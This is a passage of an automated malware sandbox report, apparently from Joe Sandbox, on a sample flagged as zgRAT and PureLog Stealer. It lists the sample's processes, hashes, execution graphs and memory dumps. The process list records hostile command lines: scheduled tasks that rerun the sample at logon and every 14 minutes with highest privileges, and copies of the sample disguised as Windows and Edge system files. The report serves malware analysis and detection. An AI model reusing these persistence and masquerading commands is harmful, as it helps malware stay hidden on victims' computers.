                                                        File size:235'008 bytes
                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:19
                                                        Start time:00:22:00
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:schtasks.exe /create /tn "0JLWNg4Sz1" /sc ONLOGON /tr "'C:\Users\user\Desktop\0JLWNg4Sz1.exe'" /rl HIGHEST /f
                                                        Imagebase:0x7ff76f990000
                                                        File size:235'008 bytes
                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:20
                                                        Start time:00:22:00
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:schtasks.exe /create /tn "0JLWNg4Sz10" /sc MINUTE /mo 14 /tr "'C:\Users\user\Desktop\0JLWNg4Sz1.exe'" /rl HIGHEST /f
                                                        Imagebase:0x7ff76f990000
                                                        File size:235'008 bytes
                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:21
                                                        Start time:00:22:01
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\oLZ05R153F.bat"
                                                        Imagebase:0x7ff6ba420000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:22
                                                        Start time:00:22:01
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:23
                                                        Start time:00:22:01
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\System32\chcp.com
                                                        Wow64 process (32bit):false
                                                        Commandline:chcp 65001
                                                        Imagebase:0x7ff7bf690000
                                                        File size:14'848 bytes
                                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:24
                                                        Start time:00:22:01
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\System32\PING.EXE
                                                        Wow64 process (32bit):false
                                                        Commandline:ping -n 10 localhost
                                                        Imagebase:0x7ff607770000
                                                        File size:22'528 bytes
                                                        MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:25
                                                        Start time:00:22:02
                                                        Start date:30/10/2024
                                                        Path:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        Imagebase:0x80000
                                                        File size:1'688'064 bytes
                                                        MD5 hash:844679E76D8254BEDD67C98610F7D7AC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:26
                                                        Start time:00:22:02
                                                        Start date:30/10/2024
                                                        Path:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        Imagebase:0xef0000
                                                        File size:1'688'064 bytes
                                                        MD5 hash:844679E76D8254BEDD67C98610F7D7AC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:27
                                                        Start time:00:22:02
                                                        Start date:30/10/2024
                                                        Path:C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files (x86)\microsoft\Edge\smartscreen.exe"
                                                        Imagebase:0xf10000
                                                        File size:1'688'064 bytes
                                                        MD5 hash:844679E76D8254BEDD67C98610F7D7AC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 100%, Avira
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 66%, ReversingLabs
                                                        Has exited:true

                                                        Target ID:28
                                                        Start time:00:22:02
                                                        Start date:30/10/2024
                                                        Path:C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files (x86)\microsoft\Edge\smartscreen.exe"
                                                        Imagebase:0xac0000
                                                        File size:1'688'064 bytes
                                                        MD5 hash:844679E76D8254BEDD67C98610F7D7AC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:29
                                                        Start time:00:22:02
                                                        Start date:30/10/2024
                                                        Path:C:\Recovery\StartMenuExperienceHost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Recovery\StartMenuExperienceHost.exe
                                                        Imagebase:0xc80000
                                                        File size:1'688'064 bytes
                                                        MD5 hash:844679E76D8254BEDD67C98610F7D7AC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\StartMenuExperienceHost.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\StartMenuExperienceHost.exe, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 100%, Avira
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 66%, ReversingLabs
                                                        Has exited:true

                                                        Target ID:30
                                                        Start time:00:22:02
                                                        Start date:30/10/2024
                                                        Path:C:\Recovery\StartMenuExperienceHost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Recovery\StartMenuExperienceHost.exe
                                                        Imagebase:0xb70000
                                                        File size:1'688'064 bytes
                                                        MD5 hash:844679E76D8254BEDD67C98610F7D7AC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:31
                                                        Start time:00:22:10
                                                        Start date:30/10/2024
                                                        Path:C:\Recovery\StartMenuExperienceHost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Recovery\StartMenuExperienceHost.exe"
                                                        Imagebase:0x860000
                                                        File size:1'688'064 bytes
                                                        MD5 hash:844679E76D8254BEDD67C98610F7D7AC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                          Execution Graph

                                                          Execution Coverage:2.5%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:3
                                                          Total number of Limit Nodes:0
                                                          execution_graph 11586 7ffd9bb11cd1 11589 7ffd9bb11cef QueryFullProcessImageNameA 11586->11589 11588 7ffd9bb11e94 11589->11588

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1716023327.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b770000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 5Z_H
                                                          • API String ID: 0-3267294416
                                                          • Opcode ID: 2d775ea22a9bdce30337f20ef2ecfd64fc746995d74d8bde5fa57b952dae6c0c
                                                          • Instruction ID: 0192c112913836a8f254906218b8a48a1be9abfc9c5dc4733e6ec677e9cbb820
                                                          • Opcode Fuzzy Hash: 2d775ea22a9bdce30337f20ef2ecfd64fc746995d74d8bde5fa57b952dae6c0c
                                                          • Instruction Fuzzy Hash: 6791D6B5A19A9D4FEB55DF688869BA87FE1FF55704F0001BED049D72E2EAB82410C740

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1719957584.00007FFD9BB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9bb10000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID: FullImageNameProcessQuery
                                                          • String ID:
                                                          • API String ID: 3578328331-0
                                                          • Opcode ID: f06d41302da8164f8bf6f68e0b2f89bc4a29595586eb73367121f7c8425ffb0b
                                                          • Instruction ID: 77027d75373a1e5dfe95522c163b306c775e07ce1ed005cdbc9b1efab97a8713
                                                          • Opcode Fuzzy Hash: f06d41302da8164f8bf6f68e0b2f89bc4a29595586eb73367121f7c8425ffb0b
                                                          • Instruction Fuzzy Hash: 37719230608A8D8FDB68DF68C8557F937E1FB59315F00427EE84EC7292CB7599468B81
                                                          • Snapshot File: hcaresult_0_2_7ffd9b770000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8a38f57ed639fef3d88d11df78701187595349350ded237a282492a867519792
                                                          • Instruction ID: 036e8af56f23f0f284f01f510b383e4077dfe8aa50ea0e621eed4e322330a2b4
                                                          • Opcode Fuzzy Hash: 8a38f57ed639fef3d88d11df78701187595349350ded237a282492a867519792
                                                          • Instruction Fuzzy Hash: 6AB01200E5750F00E82431FA0CE20A5B040DB44110FC20271D40C411F198CD12D40282
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1716023327.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b770000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a356a445c7444da277418655de0d64a20d14b7fd259fe8e1dcec3ab04cc465c1
                                                          • Instruction ID: aa4335d639f11fad10cfd9083291069f188472a50696d56f4d975dc6008051bc
                                                          • Opcode Fuzzy Hash: a356a445c7444da277418655de0d64a20d14b7fd259fe8e1dcec3ab04cc465c1
                                                          • Instruction Fuzzy Hash: F1B09222E1A35D42F72492A084A12FA71529F44710F5AC6B2900FA74E18C682B899681
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1717341099.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b8d0000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: !$$tX*$$tX*$$tX*$$tX*$$tX*$'Ql$'Ql$'Ql$'Ql$'Ql$'Ql$'Ql$ZcW$ZcW$ZcW$ZcW$ZcW$ZcW$`+0$`+0$`+0$`+0$`+0$`+0$`+0$`+0$`+0$arij$arij$arij$arij$arij$arij$arij$arij$u~(<$u~(<$u~(<$z^a$z^a$z^a$z^a$z^a$z^a$z^a$z^a$xg$xg$xg$xg$xg$d)$d)$d)$d)$d)$d)$d)$d)
                                                          • API String ID: 0-799221730
                                                          • Opcode ID: f2fdfcc84d67d7c33c2faefa3c26d25d826dbd7bc08796803c79be2444b3d304
                                                          • Instruction ID: e851a523e64263331ae07446205e47040d750101e736eae8df6e2db828d5909f
                                                          • Opcode Fuzzy Hash: f2fdfcc84d67d7c33c2faefa3c26d25d826dbd7bc08796803c79be2444b3d304
                                                          • Instruction Fuzzy Hash: 72544174A145198FD758EB68C8A5AB9B7E2FF98300F5141F9D40EE7392DE34AA81CF01
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1717341099.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b8d0000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: !$$tX*$$tX*$$tX*$$tX*$$tX*$'Ql$'Ql$'Ql$'Ql$'Ql$'Ql$'Ql$ZcW$ZcW$ZcW$ZcW$ZcW$ZcW$`+0$`+0$`+0$`+0$`+0$`+0$`+0$`+0$`+0$arij$arij$arij$arij$arij$arij$arij$arij$u~(<$u~(<$u~(<$z^a$z^a$z^a$z^a$z^a$z^a$z^a$z^a$xg$xg$xg$xg$xg$d)$d)$d)$d)$d)$d)$d)$d)
                                                          • API String ID: 0-799221730
                                                          • Opcode ID: 38b8f34f52dc46d04f59bd23e4ba9c8a4eda81347ad58d8880ae4e7262d0c17b
                                                          • Instruction ID: 72ec1491152548c4759a68da15599a0fb7feda1732959dbc4e19617863dea893
                                                          • Opcode Fuzzy Hash: 38b8f34f52dc46d04f59bd23e4ba9c8a4eda81347ad58d8880ae4e7262d0c17b
                                                          • Instruction Fuzzy Hash: 32544174A145198FD758EB68C8A5AB9B7E2FF98300F5141F9D40EE7392DE34AA81CF01
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1719957584.00007FFD9BB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9bb10000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6793ef728a6eb5af5de62f15bdf99abaff7a91b44d9025ffaf99a77205f6eece
                                                          • Instruction ID: 5ed0e864eb6647c3258fdcae8bf8acccd12eadb601e8672e6cc5787e6ab84e0f
                                                          • Opcode Fuzzy Hash: 6793ef728a6eb5af5de62f15bdf99abaff7a91b44d9025ffaf99a77205f6eece
                                                          • Instruction Fuzzy Hash: 68F1C630A09A8D8FEBA8DF28C8557E937E1FF55310F04426EE85DC72D5DB34A9458B82
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1716023327.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b770000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 920d4aeae8e41c0744060413ee46885ce784d249080e39ef9551939095218a0a
                                                          • Instruction ID: 2131387b21bfd277a136900a21b7093bbec8dbb55a858b4a451edd6540191628
                                                          • Opcode Fuzzy Hash: 920d4aeae8e41c0744060413ee46885ce784d249080e39ef9551939095218a0a
                                                          • Instruction Fuzzy Hash: 3B51D5B5A29A5D8FE798DF9C88A9BA87FD0FB55718F4001BED009D33E5DAB81410C740
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1716023327.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b770000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: c9$!k9$"s9$#{9
                                                          • API String ID: 0-1692736845
                                                          • Opcode ID: 51fd79c667bacd829b0d4d19991ac8e0617b0579adac06d6b4f1d291b1fe4dc3
                                                          • Instruction ID: 94ed6aca618183f7cef260e4564ba404950b9f2db8b5c9dc2806387ef64cf9cd
                                                          • Opcode Fuzzy Hash: 51fd79c667bacd829b0d4d19991ac8e0617b0579adac06d6b4f1d291b1fe4dc3
                                                          • Instruction Fuzzy Hash: 9A41F20BB8D6264DE31933FD75619FD6B82CFA1379B0842B7F15E890D74E48208187E5

                                                          Execution Graph

                                                          Execution Coverage:2.4%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:6
                                                          Total number of Limit Nodes:0
                                                          execution_graph 37503 7ffd9b7c74b5 37505 7ffd9b7c74cf CreateFileTransactedW 37503->37505 37506 7ffd9b7c75ca 37505->37506 37499 7ffd9b7c7691 37500 7ffd9b7c76f4 WriteFile 37499->37500 37502 7ffd9b7c7777 37500->37502

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 129 7ffd9b780d47-7ffd9b780d9b call 7ffd9b7807d0 132 7ffd9b780da0-7ffd9b780eb9 129->132 147 7ffd9b780ebb-7ffd9b780f05 132->147 148 7ffd9b780f27-7ffd9b781050 132->148 156 7ffd9b780f1e 147->156 157 7ffd9b780f07-7ffd9b780f1d 147->157 158 7ffd9b780f1f-7ffd9b780f26 156->158 157->158 158->148

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 113 7ffd9b7c74b5-7ffd9b7c7542 117 7ffd9b7c754c-7ffd9b7c75c8 CreateFileTransactedW 113->117 118 7ffd9b7c7544-7ffd9b7c7549 113->118 119 7ffd9b7c75ca 117->119 120 7ffd9b7c75d0-7ffd9b7c75fa 117->120 118->117 119->120
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4182000184.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_7ffd9b7b1000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID: CreateFileTransacted
                                                          • String ID:
                                                          • API String ID: 2149338676-0
                                                          • Opcode ID: 087f8df9f50c97cecbe848a5a16e0cd8f1d26812891d6f0adba686bc54466401
                                                          • Instruction ID: f415f8f29e3d72ab4e17c400024afb907dae7e93c9b7c20b419539f0e6430d4d
                                                          • Opcode Fuzzy Hash: 087f8df9f50c97cecbe848a5a16e0cd8f1d26812891d6f0adba686bc54466401
                                                          • Instruction Fuzzy Hash: 3F41A07190CB5C8FDB58DF48D845AA97BF0FB69310F00426FE089D3251CA70A8458B82

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 122 7ffd9b7c7691-7ffd9b7c7721 125 7ffd9b7c772b-7ffd9b7c7775 WriteFile 122->125 126 7ffd9b7c7723-7ffd9b7c7728 122->126 127 7ffd9b7c7777 125->127 128 7ffd9b7c777d-7ffd9b7c77a5 125->128 126->125 127->128
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4182000184.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_7ffd9b7b1000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID: FileWrite
                                                          • String ID:
                                                          • API String ID: 3934441357-0
                                                          • Opcode ID: 7e70422e3dab4a3a26e7f76fc19fbb4afc6b4577b9e3d5a311ec3d502363f181
                                                          • Instruction ID: 1cb173efe2eff617fcc4c18490645889de38899e403f6f4e1f2cdd8072373ee1
                                                          • Opcode Fuzzy Hash: 7e70422e3dab4a3a26e7f76fc19fbb4afc6b4577b9e3d5a311ec3d502363f181
                                                          • Instruction Fuzzy Hash: A931A03090CA5C9FDB18DF58D845AB9BBF1FBA9311F00426FD049D3292CB74A846CB91

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 227 7ffd9bb30219-7ffd9bb3024a 228 7ffd9bb3024e-7ffd9bb30255 227->228

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 238 7ffd9bb2c849-7ffd9bb2c874 240 7ffd9bb2c878-7ffd9bb2c87d 238->240

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 235 7ffd9bb2a549-7ffd9bb2a55d 236 7ffd9bb2a55f-7ffd9bb2a574 235->236 237 7ffd9bb2a578-7ffd9bb2a57d 236->237

Control-flow Graph

Legend: Executed / Not Executed

[Figure: control-flow graph. Node 241 (7ffd9b7a97e9-7ffd9b7a9814) -> node 243 (7ffd9b7a9818-7ffd9b7a981d).]
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4182000184.00007FFD9B7A4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A4000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_7ffd9b7a4000_DViaOgnvmAhwCXZ.jbxd
                                                          • API String ID:
                                                          • Opcode ID: 7d2653e75deb4aec2a35f29845a8362acadb53717514e52e18eb8e9c38d5d38a
                                                          • Instruction ID: 2120b12a05524645e734409c0f24678e8075a27e28733d177449e8379458256a
                                                          • Opcode Fuzzy Hash: 7d2653e75deb4aec2a35f29845a8362acadb53717514e52e18eb8e9c38d5d38a
                                                          • Instruction Fuzzy Hash: 5F11ABA298E3C21FC7030B705CAA4917FB49E63229B4A41EBC085CB4A3E55C199BC762
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4187528742.00007FFD9BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_7ffd9bb20000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 32b9a9eb2c2944b33cd1270869ec5ad5966d8f581cf56b4a7ddb1f17f8d33bf8
                                                          • Instruction ID: 54d7dad23e15a7332a19f661d9574aec566bc3bc33ed0ef82b9e69db3f475bbc
                                                          • Opcode Fuzzy Hash: 32b9a9eb2c2944b33cd1270869ec5ad5966d8f581cf56b4a7ddb1f17f8d33bf8
                                                          • Instruction Fuzzy Hash: 85118831A0D6590FF3AAE62884B52B87BD0FFA8344F4905BFD45AC75F2D9186EC18301
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4187528742.00007FFD9BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_7ffd9bb20000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3038ab2651911cd6bdc1541d1a31812b7c3412ec8293a701ae0930f4428cd7f6
                                                          • Instruction ID: 54d64751ea64749a332f61cccd621ccfcf672525b5a91e34f4b1f37db6467014
                                                          • Opcode Fuzzy Hash: 3038ab2651911cd6bdc1541d1a31812b7c3412ec8293a701ae0930f4428cd7f6
                                                          • Instruction Fuzzy Hash: 0E116031F0991D8FE7A5EA98C4A0BFD77A1EF68314F110135E819972E5CE29AD818BC0
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4182000184.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_7ffd9b780000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bb0da6a46d4b284f971977a24772ad0f3cf71952490efb496d7a76abeeff8f5f
                                                          • Instruction ID: 2e38703c29142a61fa252b8a39681d6c79e9074dc4c8b36c25cb3b1b83aa0859
                                                          • Opcode Fuzzy Hash: bb0da6a46d4b284f971977a24772ad0f3cf71952490efb496d7a76abeeff8f5f
                                                          • Instruction Fuzzy Hash: F4118635B0EB8D8FE712DB6898A51EC7FB0EF52211F1646F7C484DB1E2D93416498781
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4182000184.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_7ffd9b780000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 23a8a7d32beeb55120a499870c0f04a1bd7d4f728746e43c8beaf3061e686c84
                                                          • Instruction ID: 7e7458c80985b8e4f0945d7dbd4c815da9c231f5767b950c77639bed8fac47bf
                                                          • Opcode Fuzzy Hash: 23a8a7d32beeb55120a499870c0f04a1bd7d4f728746e43c8beaf3061e686c84
                                                          • Instruction Fuzzy Hash: E9016135A0EB8C8FE712DB6488A41DDBFB0EF52211F1646EBC485DB1E2DA3456498B81
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4182000184.00007FFD9B7A4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A4000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_7ffd9b7a4000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 907434b3550ffdfebb1013bdc3b3dd23ef2e9ff4fa53a2a6dc2b2ede005dfa3e
                                                          • Instruction ID: 73a94d5e0ffa73a9c18385e28098f995084bfa180df6cf0793deee9320a8a679
                                                          • Opcode Fuzzy Hash: 907434b3550ffdfebb1013bdc3b3dd23ef2e9ff4fa53a2a6dc2b2ede005dfa3e
                                                          • Instruction Fuzzy Hash: ED019675A1CB888FD7A4DF18844572AB7E2FBA8315F114A2EA09DD3660DB30A8018B42
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4182000184.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_7ffd9b780000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5554ce8cfa5bda4a09edcef3f4ce8531ce752d1f95435721850e8c5bd83630bd
                                                          • Instruction ID: 5f4a9e9009faadc229a886ba962064a22a19c0a60235ae16323da3e99fa88289
                                                          • Opcode Fuzzy Hash: 5554ce8cfa5bda4a09edcef3f4ce8531ce752d1f95435721850e8c5bd83630bd
                                                          • Instruction Fuzzy Hash: 68F03630B19D1D8EEB64EA54D8E56F873A1FF54312F1601FDD00ED36B1DD786A814A04
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4182000184.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_7ffd9b780000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 27204e0678c9fe9de8d125915eb7b8bb1059bd83c89202b1961172c7450f7150
                                                          • Instruction ID: 00bbdaf113da6d1a47c76f7260f8b7c5db667e7490eae7c43f01a6ee9f3c926f
                                                          • Opcode Fuzzy Hash: 27204e0678c9fe9de8d125915eb7b8bb1059bd83c89202b1961172c7450f7150
                                                          • Instruction Fuzzy Hash: 84018434A0D7888FD722DB6484A41DDBFB0EF02315F1542EBC484CB1E2D9345644C741
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4187528742.00007FFD9BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_7ffd9bb20000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f86bfbc49976e58033b4cabffd509f0f1293330b90b9ba29c5cbe447d76fc8e5
                                                          • Instruction ID: 2f51dd117204f6ecb1b598de72b46fe140d2d991bf199a45711153f6e99ca000
                                                          • Opcode Fuzzy Hash: f86bfbc49976e58033b4cabffd509f0f1293330b90b9ba29c5cbe447d76fc8e5
                                                          • Instruction Fuzzy Hash: 60F02B20B08F480FC7295A2D58AC4A17BE1CF6A21174A43EFD005C72B3DD19AC858341
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4187528742.00007FFD9BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_7ffd9bb20000_DViaOgnvmAhwCXZ.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
